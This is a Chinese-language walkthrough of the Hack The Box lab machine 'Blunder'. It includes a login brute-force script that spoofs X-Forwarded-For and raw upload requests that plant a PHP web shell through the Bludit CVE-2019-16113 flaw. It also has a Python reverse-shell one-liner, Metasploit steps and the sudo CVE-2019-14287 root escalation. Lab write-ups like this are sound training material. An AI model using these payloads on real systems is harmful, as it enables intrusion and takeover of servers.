Contents

HTB Blunder Writeup

Contents

HTB Blunder 靶机渗透笔记

Info card: https://gitee.com/leonsec/images/raw/master/image-20200710114842926.png

先用nmap探测一下:nmap -A -sV 10.10.10.191

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_18-18-04.png

发现80端口有web服务,直接访问,收集信息时在源码看见: https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_18-19-28.png

搜索关键词bl-themes后得知该主题是Bludit CMS的主题 查找相关漏洞发现:CVE-2019-16113 然后顺藤摸瓜找到了漏洞发现者在github报送的issue: https://gitee.com/leonsec/images/raw/master/火狐截图_2020-07-09T09-49-56.045Z.png

找到了作者挖掘该漏洞的博客:某CMS 审计记录

要利用该漏洞,需要登录到后台,先进行信息收集,看能不能找到什么课利用的: 扫目录:python3 dirsearch.py -u http://10.10.10.191 -e *

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_20-42-28.png

得到后台路径/admin

然后使用wfuzz工具: 参考:Web模糊测试:WFuzz的坑和快速入门

找到了todo.txt

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_18-17-11.png

看到inform fergus that the new blog needs images ,可以猜测fergus是一个用户

接下来找密码 使用cewl工具利用网站信息生成字典:cewl -w wordlists.txt -d 10 -m 1 http://10.10.10.191/ 参考:Kali Linux字典生成工具Cewl使用全指南 生成了wordlists.txthttps://gitee.com/leonsec/images/raw/master/截图_2020-07-10_12-12-01.png

使用脚本爆破:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import re
import requests
#from __future__ import print_function


def open_ressources(file_path):
    return [item.replace("\n", "") for item in open(file_path).readlines()]

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/HTB/blunder/wordlists.txt')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

经过漫长的等待后得到: https://gitee.com/leonsec/images/raw/master/截图_2020-07-10_11-21-02.png

于是使用用户名fergus密码RolandDeschain登录后台 在新增内容处上传图片:

然后抓包修改为:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.191/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3380177671124347526457106204
Content-Length: 553
Connection: close
Cookie: BLUDIT-KEY=rvrffshnr7288rhfq343kgua41

-----------------------------3380177671124347526457106204
Content-Disposition: form-data; name="images[]"; filename="leon.jpg"
Content-Type: image/png

<?PHP fputs(fopen('leon.php','w'),'<?php eval($_GET[aaa])?>');?>
-----------------------------3380177671124347526457106204
Content-Disposition: form-data; name="uuid"

../../tmp
-----------------------------3380177671124347526457106204
Content-Disposition: form-data; name="tokenCSRF"

ceb56bf227d17480762ba33e8a3afce642adca4e
-----------------------------3380177671124347526457106204--

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_22-12-52.png

上传.htaccess

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.191/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3380177671124347526457106204
Content-Length: 546
Connection: close
Cookie: BLUDIT-KEY=rvrffshnr7288rhfq343kgua41

-----------------------------3380177671124347526457106204
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/png

RewriteEngine Off
AddType application/x-httpd-php .jpg 
-----------------------------3380177671124347526457106204
Content-Disposition: form-data; name="uuid"

../../tmp
-----------------------------3380177671124347526457106204
Content-Disposition: form-data; name="tokenCSRF"

ceb56bf227d17480762ba33e8a3afce642adca4e
-----------------------------3380177671124347526457106204--

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_22-13-03.png

然后访问http://10.10.10.191/bl-content/tmp/leon.jpg生成shell,就获得了www-date权限

使用python反弹个交互shell:

1
http://10.10.10.191/bl-content/tmp/leon.php?aaa=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.44",9800));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_22-25-45.png

现在需要获得普通user权限,信息收集后发现www文件夹下有另一个版本的Bludit,在bludit-3.10.0a/bl-content/databases/users.php发现:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_22-30-19.png

然后在线网站解密:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-09_22-32-09.png

于是su hugo输入Password120获得user权限 在用户目录拿到user.txt

接下来要获取root权限,但是这种方法获得的shell好像行不通

于是换成了msf获取,msf上已经有了这个洞的exp:

1
2
3
4
5
6
7
8
9
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOST 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set RPORT 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

然后获得交互shell:

1
2
3
4
5
6
7
meterpreter > shell
Process 4872 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$

切换为hugo

1
2
3
4
5
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120

hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

查看下sudo权限:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

https://gitee.com/leonsec/images/raw/master/截图_2020-07-10_11-25-50.png

发现(ALL, !root) /bin/bash,想起来之前fmyy发过的linux权限漏洞:CVE_2019_14287

于是直接:sudo -u#-1 /bin/bash,得到:

https://gitee.com/leonsec/images/raw/master/截图_2020-07-10_11-28-44.png

https://gitee.com/leonsec/images/raw/master/截图_2020-07-10_11-28-02.png

然后直接在r/root目录拿到root.txt

Reference

Hack-The-Box-walkthrough[blunder]